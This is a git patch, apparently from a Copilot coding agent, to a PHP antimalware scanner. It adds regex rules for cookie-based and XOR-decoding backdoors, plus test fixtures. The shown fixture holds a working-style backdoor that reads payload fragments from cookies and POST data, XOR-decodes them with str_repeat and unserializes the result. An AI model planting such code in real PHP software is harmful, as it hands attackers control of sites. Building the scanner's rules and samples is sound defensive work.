From 3c8f70b01bcdef67be6b8318a32c70dd4e1a515a Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 5 May 2026 21:01:25 +0000 Subject: [PATCH 1/2] Initial plan From c9b45f704445878c2ee8954abea6a58dccff7df2 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 5 May 2026 21:35:06 +0000 Subject: [PATCH 2/2] Changes before error encountered Agent-Logs-Url: https://github.com/marcocesarato/PHP-Antimalware-Scanner/sessions/1a932226-2fdc-471c-97ce-7638ab75df07 Co-authored-by: marcocesarato <36447518+marcocesarato@users.noreply.github.com> --- src/Exploits.php | 24 +++++++++ tests/Fixtures/malware/cookie_backdoor.php | 49 +++++++++++++++++++ .../malware/globals_include_backdoor.php | 28 +++++++++++ 3 files changed, 101 insertions(+) create mode 100644 tests/Fixtures/malware/cookie_backdoor.php create mode 100644 tests/Fixtures/malware/globals_include_backdoor.php diff --git a/src/Exploits.php b/src/Exploits.php index d027063..96355f2 100644 --- a/src/Exploits.php +++ b/src/Exploits.php @@ -431,6 +431,30 @@ class Exploits 'pattern' => '/[;\s]*sg\_load[\s]*\([\s]*[\\\'\"][A-Za-z0-9+\/]{150,}={0,3}[\\\'\"][\s]*\)/i', 'link' => 'https://www.sourceguardian.com', ], + // cookie/session-based PHP backdoor: $_COOKIE is assigned to a local var then accessed via substr key + 'cookie_backdoor' => [ + 'description' => 'Cookie-based backdoor that reads HTTP cookie data using a substring of an obfuscated key to retrieve and execute malicious payloads', + 'level' => CodeMatch::DANGEROUS, + 'pattern' => '/\$_COOKIE[\s]*;.*?@?\$\w+[\s]*\[[\s]*substr[\s]*\(/si', + ], + // XOR decryption via str_repeat used in cookie/session-based backdoors + 'xor_str_repeat' => [ + 'description' => 'XOR decryption using str_repeat is typically used in cookie-based PHP backdoors to decode and execute malicious payloads', + 'level' => CodeMatch::DANGEROUS, + 'pattern' => '/\$\w+[\s]*\[[\s]*0[\s]*\][\s]*\^[\s]*str_repeat[\s]*\(/i', + ], + // str_replace stripping PHP opening tag then eval — used to execute injected code + 'str_replace_eval' => [ + 'description' => 'Stripping PHP opening tags via str_replace with an empty replacement and then passing the result to eval, commonly used in obfuscated backdoors', + 'level' => CodeMatch::DANGEROUS, + 'pattern' => '/str_replace[\s]*\([^,]+,[\s]*["\']["\'][\s]*,.*?\)[\s]*;[^;]*eval[\s]*\(/si', + ], + // urldecode/rawurldecode function name built via string concatenation to evade detection + 'urldecode_obfuscation' => [ + 'description' => 'Obfuscated urldecode or rawurldecode function call built via string concatenation, typically used to hide XOR-based payload decoding in backdoors', + 'level' => CodeMatch::DANGEROUS, + 'pattern' => '/["\']url["\'][\s]*\.[\s]*["\']decode["\']/i', + ], ]; /** diff --git a/tests/Fixtures/malware/cookie_backdoor.php b/tests/Fixtures/malware/cookie_backdoor.php new file mode 100644 index 0000000..4848d3e --- /dev/null +++ b/tests/Fixtures/malware/cookie_backdoor.php @@ -0,0 +1,49 @@ +loadPayload('arg'); + } + + public function __construct($arg = 0) + { + $post = $_POST; + $cookies = $_COOKIE; + $key = '301407a7-7bdd-4637-b5c9-06e442e49d5a'; + $data = @$cookies[substr($key, 0, 4)]; + if (!empty($data)) { + $parts = explode(',', $data); + $raw = ''; + foreach ($parts as $part) { + $raw .= @$cookies[$part]; + $raw .= @$post[$part]; + } + $raw = array_map('base64_decode', array($raw)); + $raw = $raw[0] ^ str_repeat($key, (strlen($raw[0]) / strlen($key)) + 1); + BackdoorLoader::$store = @unserialize($raw); + } + } + + public static $store = false; +} + +$loader = new BackdoorLoader(0); diff --git a/tests/Fixtures/malware/globals_include_backdoor.php b/tests/Fixtures/malware/globals_include_backdoor.php new file mode 100644 index 0000000..4a52bba --- /dev/null +++ b/tests/Fixtures/malware/globals_include_backdoor.php @@ -0,0 +1,28 @@ +